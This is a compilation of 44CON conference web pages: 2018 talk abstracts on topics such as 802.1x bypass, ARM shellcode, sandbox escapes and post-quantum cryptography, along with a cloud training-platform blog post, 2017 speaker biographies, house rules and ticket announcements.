          Host introspection complements the network controls implemented using the SmartNIC by enabling the measurement of the integrity and the behavior of workloads (virtual machines, containers, bare metal servers) to identify possible indicators of compromise. The visibility and context gained also enhances the granularity of network controls, resulting in measurably better security for the data center compared to traditional software-only based controls.

          A live demo will showcase this capability.

          Bypassing Port-Security In 2018 – Defeating MacSEC and 802.1x-2010

          Presented by: Gabriel Ryan

          Existing techniques for bypassing wired port security are limited to attacking 802.1x-2004, which does not provide encryption or the ability to perform authentication on a packet-by-packet basis [1][2][3][4]. The development of 802.1x-2010 mitigates these issues by using MacSEC to provide Layer 2 encryption and packet integrity check to the protocol [5]. Since MacSEC encrypts data on a hop-by-hop basis, it successfully protects against the bridge-based attacks pioneered by the likes of Steve Riley, Abb, and Alva Duckwall [5][6].

          In addition to the development of 802.1x-2010, improved 802.1x support by peripheral devices such as printers also poses a challenge to attackers. Gone are the days in which bypassing 802.1x was as simple as finding a printer and spoofing address, as hardware manufacturers have gotten smarter.

          In this talk, we will introduce a novel technique for bypassing 802.1x-2010 by demonstrating how MacSEC fails when weak forms of EAP are used. Additionally, we will discuss how improved 802.1x support by peripheral devices does not necessarily translate to improved port-security due to the widespread use of weak EAP. Finally, we will consider how improvements to the Linux kernel have made bridge-based techniques easier to implement and demonstrate an alternative to using packet injection for network interaction. We have packaged each of these techniques and improvements into an open source tool called Silent Bridge, which we plan on releasing at the conference.

          References:

          1. https://blogs.technet.microsoft.com/steriley/2005/08/11/august-article-802-1x-on-wired-networks-considered-harmful/
          2. https://www.defcon.org/images/defcon-19/dc-19-presentations/Duckwall/DEFCON-19-Duckwall-Bridge-Too-Far.pdf
          3. https://www.gremwell.com/marvin-mitm-tapping-dot1x-links
          4. https://hackinparis.com/data/slides/2017/2017_Legrand_Valerian_802.1x_Network_Access_Control_and_Bypass_Techniques.pdf
          5. https://www.cisco.com/c/en/us/products/collateral/ios-nx-os-software/identity-based-networking-services/deploy_guide_c17-663760.html
          6. https://1.ieee802.org/security/802-1ae/

          Make ARM Shellcode Great Again

          Presented by: Saumil Shah

          Compared to x86, ARM shellcode has made little progress. The x86 hardware is largely homogenous. ARM, however, has several versions and variants across devices today. There are several constraints and subtleties involved in writing production quality ARM shellcode which works on modern ARM hardware, not just on QEMU emulators.

          In this talk, we shall explore issues such as overcoming cache coherency, reliable polymorphic shellcode, ARM egghunting and last but not least, polyglot ARM shellcode. A bonus side effect of this talk will be creating headaches for those who like to defend against attacks using age old signature based techniques. There will be demonstrations of my shellcode on ARM IoT devices featuring different types of ARM architecture. A detailed article shall also be submitted to PoC||GTFO closer to the time of the conference.

          Exploits with Scratch

          Presented by: Kevin Sheldrake

          Scratch is a programming language and IDE targeted at teaching young children how to code. The environment is sprite-based with all code residing behind each of the sprites and the stage (background). It is particularly good at developing games not unlike the flash-based games of the 90s/00s. Typically, the Scratch environment is a sandbox limiting all actions to objects within its own world. With the offline version of Scratch v2, however, it is possible to load ‘experimental HTTP extensions’ that can introduce new blocks linked to python functions via a web service API.

          Using the experimental extensions, I have implemented a set of blocks that allow access to TCP/IP functions. With these blocks it is possible to fuzz and exploit vulnerable services on a network-accessible victim machine. As a demonstration I have developed a PoC for the web server running on Saumil Shah’s tinysploit (stack smash) plus PoCs for two echo servers I have added to it (stack smash and format string vulnerability).

          The aims of the talk are to show that the (supposedly) sandboxed Scratch can be used to send evil packets to the network, and also to show that fuzzing and building exploits doesn’t have to involve coding abilities beyond those required to develop in Scratch. In other words, if you (or your child) wishes to learn how to write your own exploits, then this is all possible with Scratch and my experimental extension.

          The talk will cover the intricacies of the Scratch extension API and the limitations that need to be overcome to make it usable, plus how these simple concepts can be strung together to create exploits.

          Subverting Direct X Kernel For Gaining Remote System

          Presented by: Rancho Han and Chen Nan

          Since Edge introduced the win32k filter mechanism, the way of escaping the sandbox from kernel is getting narrower and narrower. In fact, on the latest win10 rs4, most types of GDI objects could not be created in the content process of Edge. In addition, the type isolation makes it very difficult to exploit a win32k bug. This is a huge challenge for breaking Edge sandbox now. However, Edge allows us to access the direct x kernel from the unfiltered syscall functions.

          Last year, Tencent ZhanluLab began to study the Direct X subsystem, and we discovered 10+ bugs in a few months. In the first part of this talk, we start with an overview of the Direct X subsystem and discuss how to analyze its interfaces and internal objects. After that, we explain three bugs representing three typical security flaws. Among the vulnerabilities we discovered, a few of them are very interesting, and it is a bit special to exploit them. We successfully leverage a vulnerability to break the Edge sandbox and escalate privilege to system. We will disclose all the details of this exploit in the second part of this talk.

          Insight into fuzzing and pwning of Adobe Flash

          Presented by: Jie Zeng

          In recent years, more hacker attacks (Advanced Persistent Threat) on Adobe Flash Player have taken place in the wild. Therefore, Adobe Flash manufacturers have higher security requirements. Various mitigations were added. At the same time more security researchers are also beginning to study the security issues of Adobe Flash, so more and more security vulnerabilities have been discovered.

          This talk will discuss how I found vulnerabilities, and the main Flash attack surface I discovered.

          And then I will carefully explain a few of the representative vulnerabilities that I have discovered, analyse the root cause of the vulnerability, and how the patches are patched.

          Finally, when we have found a vulnerability that we want to write an exploit for, we will encounter many mitigations. So I will talk about the major mitigations that Flash has added, including memory protect, isolators of heaps, CFG and Memory management of Flash.
          So in order to bypass these mitigations the exploit becomes more and more complicated, and I will share a method of memory layout that is still feasible to bypass the isolators of heaps.

          How to Explain Post-Quantum Cryptography to a Middle School Student

          Presented by: Klaus Schmeh

          One of the hottest topics in current crypto research is Post-Quantum Cryptography. This branch of cryptography addresses asymmetric crypto systems that are not prone to quantum computers.

          Virtually all asymmetric crypto systems currently in use (Diffie-Hellman, RSA, DSA, and Elliptic Curve Crypto Systems) are not Post-Quantum. They will be useless once advanced quantum computers are available. Quantum computer technology has made considerable progress in recent years, with major organisations, like Google, NSA, and NASA, investing in it.

          Post-Quantum Cryptography uses advanced mathematical concepts. Even if one knows the basics of current asymmetric cryptography (integer factorisation, discrete logarithms, …), Post-Quantum algorithms are hard to understand.

          The goal of this presentation is to explain Post-Quantum Cryptography in a way that is comprehensible for non-mathematicians. Five families of crypto systems (as good as all known Post-Quantum algorithms belong to these) will be introduced:

          Lattice-based systems:

          The concept of lattice-based asymmetric encryption will be explained with a two-dimensional grid (real-world implementations use 250 dimensions and more). Some lattice-based ciphers (e.g., New Hope) make use of the Learning with Errors (LWE) concept. I will demonstrate LWE encryption in a way that is understandable to somebody who knows Gaussian elimination (this is taught at middle school). Other lattice-based systems (especially NTRU) use truncated polynomials, which I will also explain in a simple way.

          Code-based systems:

          McEliece and a few other asymmetric ciphers are based on error correction codes. While teaching the whole McEliece algorithm might be too complex for a 44CON presentation, it is certainly possible to explain error correction codes and the main McEliece fundamentals.

          Non-commutative systems:

          There are nice ways to explain non-commutative groups and the crypto systems based on these, using everyday-life examples. Especially, twisting a Rubik’s Cube and plaiting a braid are easy-to-understand group operations a crypto system can be built on.

          Multivariate systems:

          Multivariate crypto can be explained to somebody who knows Gaussian elimination.

          Hash-based signatures:

          If properly explained, Hash-based signatures are easier to understand than any other asymmetric crypto scheme.

          I will explain these systems with cartoons, drawings, photographs, a Rubik’s Cube and other items.

          In addition, I will give a short introduction to quantum computers and the current Post-Quantum Crypto Competition (organised by US authority NIST).

          Security module for php7 – Killing bugclasses and virtual-patching the rest!

          Presented by: Julien Voisin and Thibault Koechlin

          Suhosin is a great PHP module, but unfortunately, it’s getting old, new ways have been found to compromise PHP applications, and some aren’t working anymore; and it doesn’t play well with the shiny new PHP 7. As a secure web-hosting company, we needed a reliable and future-proof solution to address the flow of new vulnerabilities that are published every day. This is why we developed Snuffleupagus, a new (and open-source!) PHP security module, that provides several features that we needed: passively killing several PHP-specific bug classes, but also implementing virtual-patching at the PHP level, allowing to patch vulnerabilities in a precise, false-positive-free, ultra-low overhead way, without even touching the applications’ code.

          Reverse Engineering and Bug Hunting on KMDF Drivers

          Presented by: Enrique Nissim

          Numerous technical articles, presentations, and even books exist about reverse engineering the Windows Driver Model (WDM) for purposes that vary from simply understanding how a specific driver works, to malware analysis and bug hunting. On the other hand, Microsoft has been providing the Kernel Mode Driver Framework (KMDF) for quite a while and we now see more and more drivers shifting to this framework instead of interacting directly with the OS like in the old WDM times. Yet, there is close to no information on how to approach this model from a reverse engineering and offensive standpoint.
          In this presentation, I will first do a quick recap on WDM drivers, their common structures, and how to identify their entry points. Then I’ll introduce KMDF with all its relevant functions for reverse engineering through a set of case-studies. I’ll describe how to interact with a KMDF device object through SetupDI api and how to find and analyze the different IO queues dispatch routines. Does the framework actually enhance security? We’ll come to a conclusion after revealing some major vendor implementation problems.
          Armed with this knowledge, you will be able to run your own bug hunting session over any KMDF driver.

           

          Also check our list of Workshops for 44CON 2018.

          #####EOF##### Building a cloud security training platform – Pt 2: Infrastructure As Code – 44CON

          Building a cloud security training platform – Pt 2: Infrastructure As Code

          This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul!

          The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own. As I described in my last blog post I also decided to build a training platform, so that students can connect to a virtual desktop in the cloud with all the software they need pre-installed.

          That way they can come on to the course with any laptop or even tablet which supports the Amazon WorkSpaces client.

          The next step after the proof of concept and design was to build it using as much automation as possible – to keep cost low, I wanted to easily destroy everything as soon as a course finished, and to rebuild just before starting the next one.

          I’m also taking the opportunity to demonstrate good security practice, and I’ll use the training environment as an example to show students during the course.

          An important security principle is segregation, so I decided to build the training environment in its own AWS account. But I didn’t want to have yet another monthly bill. So I used AWS Organizations to create the new account:

          That way, billing for all my AWS accounts is consolidated, and I can also use Service Control Policies to enforce security policies on the new account.

          The next step was to create the AWS Directory Service – this is an AWS managed Active Directory which I’ll use to manage user identities, for students to log on to their Amazon WorkSpaces virtual machines. I decided to use Terraform by HashiCorp, as it’s ideal for automating infrastructure as code:

          Here’s an example of the code snippet used to create the AWS Directory service:

          My terraform code included nearly all the required resources:

          • VPC, DMZ and private subnets in multiple availability zones, subnet routes
          • Network Address Translation (NAT) gateways and Internet gateway
          • Key and key alias in AWS Key Management Service
          • Virtual machine instance for Active Directory admin, security group and Elastic IP
          • Amazon Route 53 domain name for AD Admin virtual machine Elastic IP
          • Identity and Access Management (IAM) policy and role for AD admin virtual machine
          • AWS Systems Manager templates for domain join and Windows feature setup
          • Secrets in AWS Secrets Manager for user passwords – more on this later

          The one exception is Amazon WorkSpaces, as these are not supported by Terraform at the time of writing.

          I typed “terraform apply” and about 30 minutes later the infrastructure was built in the new AWS account, and I could see all the resources in the portal. Here’s the AWS Directory service built from the code snippet above:

          After some troubleshooting, I succeeded in automating the domain join of the AD Admin Windows Server 2016 virtual machine, using an AWS Systems Manager document template. I also created some automation templates to set up the Windows feature for Active Directory administration tools, and to install the AWS PowerShell Module, so I could use these later.

          Then, I logged in to the AD admin virtual machine using Microsoft Remote Desktop with my domain admin credentials:

          Opening Active Directory Users and Computers, I could see the AWS Directory domain.

          All I needed now was some automation scripts to create users, and then build the Amazon WorkSpaces. I’ll cover these in my next post.

          #####EOF##### 44CON 2017 Speakers – 44CON

          44CON 2017 Speakers

          Marc Newlin

          Marc Newlin is a wireless security researcher at Bastille, where he discovered the MouseJack and KeySniffer vulnerabilities. A glutton for challenging side projects, he competed solo in two DARPA challenges, placing third in the DARPA Shredder Challenge, and second in the first tournament of the DARPA Spectrum Challenge.

          Matt Knight

          Matt Knight is a software engineer and security researcher at Bastille, with a diverse background in hardware, software, and wireless security. In 2016, he exposed the internals of the closed-source LoRa PHY based on blind signal analysis. Matt holds a BE in Electrical Engineering from Dartmouth College.

          Nicky Bloor

          Always intrigued by how things work, Nicky wrote his first “Hello World” on a Commodore 64 in the early 90s. The video gaming hobby inherited from his father quickly turned into game hacking and amateur game development throughout his teenage years before later breaking into a career in infosec.

          Now a managing security consultant at NCC Group, Nicky jumps at the opportunity to take on interesting and mentally challenging projects involving reverse engineering, fuzzing, and code review whenever time allows around conducting security assessments for clients, hiking up mountains, and hanging from the occasional cliff.

          Follow Nicky on Twitter at @nickstadb

          Don Bailey

          Don A. Bailey has consistently engaged in groundbreaking research over the past decade. He helped prove SS7 to be a global threat to telephony security before anyone knew what SS7 was, and helped mitigate these threats in the USA. Don started the IoT hacking trend by performing the first remote hack of a car at Black Hat Las Vegas in 2011. Mr. Bailey uncovered a critical flaw in a compression algorithm so widely implemented that it affected the entire Yahoo infrastructure, iOS, the Linux kernel, and even the Mars Rover. He is the first and possibly only researcher to have found critical bugs affecting the Erlang virtual machine core. He was the first security researcher to perform a security analysis of the RISC-V ISA.

          Mr. Bailey sits on the advisory board of several startups and conferences, assisting with technical guidance and strategy. He was the CTO of Revolar, a startup that helps vulnerable individuals improve their safety in uncertain physical environments. While launching his own IoT startup, Don consults regularly with startups of all sizes to secure their technology stack, network architecture, and embedded technologies.

          Don has given 9 talks at Black Hat Briefings, 5 talks at Hack In The Box, and 4 talks at the infamous 44Con conference, among others. His exploits have been featured on NPR, in Reuters, FOX, BBC, Al Jazeera, and many more stations worldwide.

          Klaus Schmeh

          Klaus Schmeh is the world’s leading blogger in the field of crypto history (www.schmeh.org). Klaus’ blog has become the most important online forum for unsolved encryptions and historical ciphers. Even the NSA has forwarded to him inquiries concerning encrypted documents.

          Klaus’ blog readers have proved extremely successful in breaking old cryptograms.

          Klaus Schmeh has published 14 books, 200 articles, 700 blog posts and 20 research papers about encryption technology, which makes him the most-published cryptology author in the world. While he writes his blog in English, most of his other publications are in German.

          In his main profession as a security consultant at the German company cryptovision, Klaus uses his special skill in explaining complex technical topics, often using self-drawn cartoons and Lego brick models for visualization.

          Kev Sheldrake

          Kevin Sheldrake is a penetration tester who started working in the technical security field in 1997.

          Over the years, Kev has been a developer and systems administrator of ‘secure’ systems, an infosec policy consultant, a penetration tester, a reverse engineer and an entrepreneur who founded and ran his own security consulting company. His current interests (4+ years) are IoT, crypto and RFID; he reverse engineers and hacks devices that his employer intends to sell. He has a Masters degree, is a Chartered Engineer and, in the past, has been a CHECK Team Leader, a CISSP and held CLAS. He privately mentors others on the Stanford and Maryland crypto courses available on coursera.org.

          Kev has presented at EMF Camp, DEFCON 4420 and DEFCON 441452 on hacking embedded devices (Inside our Toys); presented on building debuggers for embedded devices at Securi-Tay (Phun with Ptrace()); and also presented a lengthy take down on the use of NLP in Social Engineering at DEFCON 4420 (Social Engineering LIES!). He has also presented regularly at his employer’s internal security conference, winning best talk in 2014 for ‘Embedded Nonsense’, a talk about hacking an IoT device and reversing its crypto, which he subsequently presented at Cyber Security Challenge.

          Jess Frazelle

          Jess Frazelle is a Software Engineer at Google. She has been a maintainer of Docker, contributor to RunC, Kubernetes and Golang as well as other projects. She loves all things involving Linux namespaces and cgroups and is probably most well known for running desktop applications in containers. She maintained the AppArmor, Seccomp, and SELinux bits in Docker and is quite familiar with locking down containers.

          Lars Haukli

          Lars Haukli was falsely accused of infecting his neighbour’s PC with a computer virus at the age of 12.

          For the past decade, he has been developing anti-malware technology to make amends for sins he never committed as a child.

          His current mission at Symantec is simple: Make the best sandbox the world has ever seen.

          David Mirza Ahmad

          David Mirza Ahmad is one of the founders of Subgraph and a Subgraph OS core developer. Prior to this he was the moderator of the Bugtraq mailing list, and was on the founding team of SecurityFocus. He was also a developer and maintainer of the Vega open source web security scanner. David works on low-level components of Subgraph OS: recently, this includes the seccomp-bpf wrapper for the sandbox, runtime profiler for policy generation, event monitor and notification system, TLS guard, and onion guard. David also manages the project and organization administration.

          Alex Plaskett

          Alex is Head of Technical Research at MWR InfoSecurity in the UK. Alex is best known for mobile and embedded vulnerability research and exploitation. Alex has previously presented at Deepsec, TROOPERS16, BlueHat, T2.Fi, Confidence, 44con and SyScan.

          James Loureiro

          James Loureiro is a senior researcher at MWR InfoSecurity, and has interests in vulnerability research and reverse engineering. James has previously presented on Windows Kernel fuzzing at DefCon in 2016 and on Adobe Reader in 2015.

          Matt Wixey

          Matt currently works as a penetration tester and researcher in the Threat and Vulnerability Management (TVM) team at PwC, and leads the team’s research capability. Prior to joining PwC, he worked in law enforcement, leading a technical R&D team. His research interests include antivirus and sandbox technologies, exploit development, and RF security.

          William Knowles

          William Knowles is a Security Consultant at MWR InfoSecurity. He is primarily involved in purple team activities, which involve objective-based testing to simulate real-world threats, and helping organisations to identify effective defences to protect and detect against them. Prior to joining the industry and getting a real job, he completed a PhD in Computer Science at Lancaster University. His research interests include post-exploitation activities and offensive PowerShell.

          Yuriy Bulygin

          Yuriy Bulygin (@c7zero) has been the chief threat researcher at Intel Security/McAfee and led the Advanced Threat Research team. Previously, Yuriy led the microprocessor vulnerability analysis team at Intel. Yuriy is the author of the open source CHIPSEC framework.

           

          Oleksandr Bazhaniuk

          Alex Bazhaniuk (@ABazhaniuk) is an independent security researcher. Previously, Alex was a member of the Advanced Threat Research and Security Center of Excellence teams at Intel and Intel Security. His primary interests are the security and exploitation of low-level hardware platforms and firmware, and binary analysis automation. His work has been presented at a number of security conferences. He is also a co-founder of DCUA, the first DEF CON group and CTF team in Ukraine.

          Nelson Murilo

          Nelson Murilo has been working at Cyber Analyst since 1992. He is the author of some security books in Portuguese and a regular contributor of Brazilian Computer Emergency Response Team. Nelson is the author of open source security tools like: chkrootkit – locally checks for the presence of a rootkit and Beholder – linux Wireless IDS. Nelson is a regular speaker in Brazil and international conferences such as Defcon, Thotcon, SAS Kaspersky, Ekoparty, MS Bluehat and Auscert.

          Graham Sutherland

          Graham is a pentester, electronics tinkerer, ex-developer, security researcher, reverse engineer, crypto enthusiast, promulgator of useless facts, vehement drunkard, and bacon aficionado. Can often be found scurrying towards a bar. One of his shoes is probably sentient.

          Collin Mulliner

          Collin Mulliner is a security researcher and software engineer and spends most of his time working on mobile and smart phones. Collin is interested in vulnerability analysis and offensive security as he believes that in order to understand defense you first have to understand offense. Collin received a Ph.D. from the Technische Universitaet Berlin in 2011, and a M.S. and B.S. in computer science from UC Santa Barbara and FH-Darmstadt. Lately Collin switched his focus to the defensive side to work on mitigations and countermeasures. Collin co-authored The Android Hacker’s Handbook.

          Nikhil Mittal

          Nikhil Mittal is a hacker, infosec researcher, speaker and enthusiast. His area of interest includes penetration testing, attack research, defence strategies and post exploitation research. He has 8+ years of experience in Penetration Testing for his clients which include many global corporate giants. He is also a member of Red teams of selected clients.

          He specializes in assessing security risks in secure environments that require novel attack vectors and an “out of the box” approach. He has worked extensively on using Human Interface Devices in penetration tests and PowerShell for post exploitation. He is the creator of Kautilya, a toolkit which makes it easy to use HIDs in penetration tests, and Nishang, a post exploitation framework in PowerShell.

          In his spare time, Nikhil researches new attack methodologies and updates his tools and frameworks. He blogs at http://www.labofapenetrationtester.com/

          Cedric Halbronn

          Cedric (@saidelike) joined NCC Group in 2015 and has been doing reverse engineering / exploit development for 8+ years. His current interests are memory corruption bugs in browsers, kernels, mobile devices, embedded devices, etc.

          Gabriel Ryan

          Gabriel Ryan (Twitter: @s0lst1c3) is a penetration tester and researcher with a passion for wireless and infrastructure testing. His career began as a systems programmer at Rutgers University, where he assessed, diagnosed, and resolved system and application issues for a user community of over 70,000 faculty, students, and staff. Gabriel then went on to work as a penetration tester and researcher for the Virginia-based defense contractor OGSystems. While at OGSystems, he worked as a lead engineer on the Mosquito project, a geospatial intelligence tool that leverages wireless technology to track potential threats.

          Gabriel currently works for the international security consulting firm Gotham Digital Science at their New York office, where he performs full scope red team penetration tests for a diverse range of clients. He also contributes heavily to his company’s research division, GDS Labs. Some of his most recent work includes a whitepaper on rogue access point detection, along with the popular tool Eaphammer, which is used for breaching WPA2-EAP networks. On the side, he serves as a member of the BSides Las Vegas senior staff, coordinating wireless security for the event. In his spare time, he enjoys live music, exploring the outdoors, and riding motorcycles.

          Olivier Bilodeau

          Olivier Bilodeau is leading the Cybersecurity Research team at GoSecure. With more than 10 years of infosec experience, Olivier managed large networks and server farms, wrote open source network access control software and recently worked as a Malware Researcher. Passionate communicator, Olivier has spoken at several conferences like Defcon, Botconf, SecTor, Derbycon and many more. Invested in his community, he co-organizes MontréHack (a monthly workshop focused on applied information security through capture-the-flag challenges), is in charge of NorthSec’s training sessions and hosts NorthSec’s Hacker Jeopardy. His primary research interests include reverse engineering tools, Linux and/or embedded malware and honeypots. To relax, he likes to participate in information security capture-the-flag competitions, work on various open source projects and brew his own beer.

          Ruben Boonen

          My name is Ruben Boonen (@FuzzySec), I have been working in InfoSec since 2012. I have a well-rounded skill set, having taken on many application, infrastructure and bespoke engagements. I have however developed a special interest for Windows: Domains, exploit development, client-side attacks, restricted environments, privilege escalation, persistence, post-exploitation and of course PowerShell!

          I love breaking stuff but it is equally important to me to share that knowledge with the wider community. I have previously been a trainer at Black Hat, Def Con and various BSides events in the UK. Additionally, I maintain an InfoSec blog (http://www.fuzzysecurity.com/) and GitHub account (https://github.com/FuzzySecurity) where I publish research on a variety of topics!

          Didier Stevens

          Didier Stevens (Microsoft MVP, SANS ISC Handler, Wireshark Certified Network Analyst, CISSP, GSSP-C, GCIA, GREM, MCSD .NET, MCSE/Security, MCITP Windows Server 2008, RHCT, CCNP Security, OSWP) is a Senior Security Analyst (NVISO https://www.nviso.be). You can find his open source security tools on his IT security related blog at https://blog.DidierStevens.com.

          Saumil Shah

          CEO, Net-Square (@therealsaumil)

          Saumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients worldwide. Saumil has been an internationally recognized conference speaker and instructor for over 18 years. He is also the co-developer of the wildly successful “Exploit Laboratory” courses and authored two books titled “Web Hacking: Attacks and Defense” and “The Anti-Virus Book”.

          Saumil holds an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time playing Pacman, flying kites, traveling around the world and taking pictures.

          James Forshaw

          James is a security researcher in Google’s Project Zero. He has been involved with computer hardware and software security for over 10 years looking at a range of different platforms and applications. With a great interest in logical vulnerabilities he’s been listed as the #1 researcher for MSRC, as well as being a Pwn2Own and Microsoft Mitigation Bypass bounty winner. He has spoken at a number of security conferences including Black Hat USA, CanSecWest, Bluehat, HITB, and Infiltrate.

          Daniel Crowley

          Daniel Crowley is a Senior Security Engineer and Regional Research Director for NCC Group Austin, tasked with finding and exploiting flaws in everything from Web applications and cryptosystems to ATMs, smart homes, and industrial control systems. He denies all allegations of unicorn smuggling and questions your character for even suggesting it. He has been working in information security since 2004. Daniel is TIME’s 2006 Person of the Year. He has developed and released various free security tools such as MCIR, a powerful Web application exploitation training and research platform, and FeatherDuster, an automated modular cryptanalysis tool. He does his own charcuterie and brews his own beer. He is a frequent speaker at conferences including Black Hat, DEFCON, Shmoocon, Chaos Communications Camp, and SOURCE. Daniel can open a door lock with his computer but still can’t launch ICBMs by whistling into a phone. He has been interviewed by various print and television media including Forbes, CNN, and the Wall Street Journal. He holds the noble title of Baron in the micronation of Sealand. His work has been included in books and college courses.

          Amanda Rousseau

          Amanda absolutely loves malware. She works as a Senior Malware Researcher at Endgame on the threat research team, focusing on dynamic behavior detection on both Windows and OSX platforms. Prior to Endgame, she worked as a malware researcher at FireEye, malware reverse engineer in commercial DFIR, and malware reverse engineer in the U.S. Department of Defense.

          You can follow her on Twitter @malwareunicorn

          Aaron Guzman

          Aaron Guzman is a Manager with Gotham Digital Science (GDS), located in Los Angeles, CA. Mr. Guzman previously worked with established tech companies such as Belkin, Linksys, Symantec and Dell SecureWorks breaking code and architecting infrastructures. Aaron has spoken at a number of conferences worldwide which include DEF CON, OWASP AppSec EU, OWASP AppSec USA, HackFest, Security Fest, HackMiami, AusCERT as well as a number of BSides events. Aaron leads the OWASP Embedded Application Security project, providing practical guidance to address the most common firmware security bugs to the embedded and IoT community. Furthermore, Aaron is a Chapter leader for the Open Web Application Security Project (OWASP) Los Angeles, Cloud Security Alliance SoCal (CSA SoCal), and a Technical Editor for Packt Publishing. He has contributed to many IoT security guidance publications from CSA, OWASP, Prpl, and others. Follow Aaron’s latest research on Twitter at @scriptingxss

          #####EOF##### Introducing 44CON’s House Rules – 44CON

          Introducing 44CON’s House Rules

          44CON was born out of a private event that Adrian and I used to occasionally get involved in organising. It was a close-knit group of people featuring deeply opinionated and often spectacularly drunk people who somehow mostly got along.

          As 44CON grew, more people outside that group attended. The new people didn’t know about our Overton window. These people paid good money for a good time, but were new to our community and we hadn’t provided guidance on what was acceptable behaviour, or how we handle concerns.

          An event with talks about exploiting human and computer trust relationships tends towards some attendees holding unusual views about acceptable behaviour. To make things easier for everyone, we introduced Wheaton’s Law. For those that don’t know, it’s fairly easy to take on board:

          “Don’t be a dick.”

          For a long time “Don’t be a dick” was the only rule we had. Every year we’d review it, and every year it would stay.

          We have had people breach the rule. We’ve had and investigated complaints. We stand by Wheaton’s law as it’s stood by us. What we haven’t done is properly track complaint resolution, and we hadn’t told people how to raise concerns. That’s why we’ve launched our House Rules. They’re not going to be perfect, but it’s a start.

          The House Rules are simply an expansion of Wheaton’s Law. They set expectations, a reporting process and circumstances under which we’ll eject someone, along with a reminder that the laws of England and Wales may not match your own at home.

          We’ve integrated feedback from event organisers up and down the country, and we’re fully open to suggestions on how to improve them for next year. To be clear, there’s no change in our expectations from previous years, only in how we communicate them.

          If you’re coming to 44CON you’ll see the house rules in your brochure or you can read them now. Please take a moment to read them, as they apply to everyone. If you have any questions, suggestions or comments, use the email address on the House rules page before the event, or follow the procedure to report a concern once you’re there.

          We want everyone to have a good time, regardless of preferred text editor, open source licensing beliefs or i/o port configuration. We hope you’ll join us and keep making 44CON a great place for everyone.

          #####EOF##### 44CON 2019 Early-Bird Tickets are now on sale – 44CON

          44CON 2019 Early-Bird Tickets are now on sale

          Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

          We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

          As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

          Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

          #####EOF##### 44CON Talks and Workshops announced – 44CON

          44CON Talks and Workshops announced

          Our CFP process has completed and we’re now putting talks and workshops up. We still have a few more to add, but there’s enough up to start checking out. So, what are we covering this year?

          This year’s talks are a heady mix of blue, red and purple team talks covering everything from bug bounties to hardware hacking, careers to cryptography and machine learning to mPoS. As always, expect to go from zero to hero, and get yer mind bent along the way. Here are some of the talks we’re really looking forward to seeing.

          [NEW] They’re All Scorpions – Successful SecOps in a Hostile Workplace by Pete Herzog

          This talk looks at how we can shift our approach to SecOps to be (more) effective in places where it feels like nobody’s listening. Pete is a battle-scarred veteran of the world of information security, and doesn’t shy away from asking (and answering) the difficult questions.

          [NEW] Catch Me If You Can: Ephemeral Vulnerabilities in Bug Bounties by Shubham Shah and Michael Gianarakis

          Bug bounties are an industry hot topic, with many people finding it hard to get in due to automation. Shubs and Mike are coming all the way from Australia to talk to us about ephemeral vulnerabilities: vulnerabilities that may pop up and disappear after short periods of time. They’ll share their secrets on industrializing bug bounty hunting, and we’ve been working with our sponsors Bugcrowd to come up with a 44CON-exclusive bug bounty to help you get started. This is a great talk for those looking to get into bug bounties, and also for those defending Internet-facing services with dynamically scaling architectures. This talk may feature some of the 300 bugs these guys have found over the past few years, but sadly it would not be possible to fit them all into a 45 minute slot.

          [UPDATED] For the Love of Money: Finding and exploiting vulnerabilities in mobile point of sales systems by Leigh-Anne Galloway and Tim Yunusov

          Ever make a payment using a mobile Point of Sale (mPoS) system such as Square or iZettle? You know, the ones with the things that plug into some random person’s compromised phone that you use to make payments.

          It turns out that some mPoS systems are not as secure as people thought they were.

          It turns out that attacking some of these things isn’t hard.

          It turns out that the cost of tampering with some of these things is about £8.

          What could possibly go wrong?

          [NEW] Weak analogies make poor realities – are we sitting on a Security Debt Crisis? By Charl van der Walt

          Security is often framed in terms of risk, and we often back up our decisions with analogies. But are we genuinely using analogies correctly, or are we simply cherry picking to justify risk decisions? In this talk, Charl looks at our approach to analogies and risk management, and explores and compares the use of security debt as a decision-making tool.

          Charl also has an incredible workshop on deploying Microsoft’s Sysmon to help detect and defend against bad things on your networks. In itself, this is a great example of using security debt as a way of measuring investment in existing tools and people over buying new shiny boxes.

          Tickets are still available from our shop. Which talks and workshops are you looking forward to? Don’t forget to let us know on Twitter!

          #####EOF##### 44CON 2018 – Page 2 – 44CON

          CRESTCon & IISP Congress 2018

          44CON is exhibiting at CRESTCon & IISP Congress on 3rd May at the Royal College of Physicians in London. Tickets are available now – www.crestandiisp.com.

          Now in its sixth year, CRESTCon and IISP Congress is a unique event that brings together leading technical and business information security professionals and is a key date in the industry calendar, attracting an impressive line-up of speakers and senior delegates.

          This year it also welcomes the BCS Security Conference in the third stream. 2017’s event welcomed over 450 delegates, had three conference streams, a bookshop/meeting area, as well as expanded exhibition and demo areas and 2018 is building further on the success of these features. The length of the day is being increased to incorporate further networking and entertainment in response to the feedback received from delegates and sponsors.

          Delegates at the event include senior security, risk and compliance managers from a wide range of public and private sector organisations, along with security consultants and business directors working in the technical information assurance and response industry.

          If you’re attending, please stop by and say hello to Steve and Marizel!

          44CON 2018 CFP Is Open!

          We’re really excited to open our Call For Papers for 44CON 2018. We’re looking forward to seeing all of your submissions on our shiny new CFP system, which promises to be far less painful than the old one.

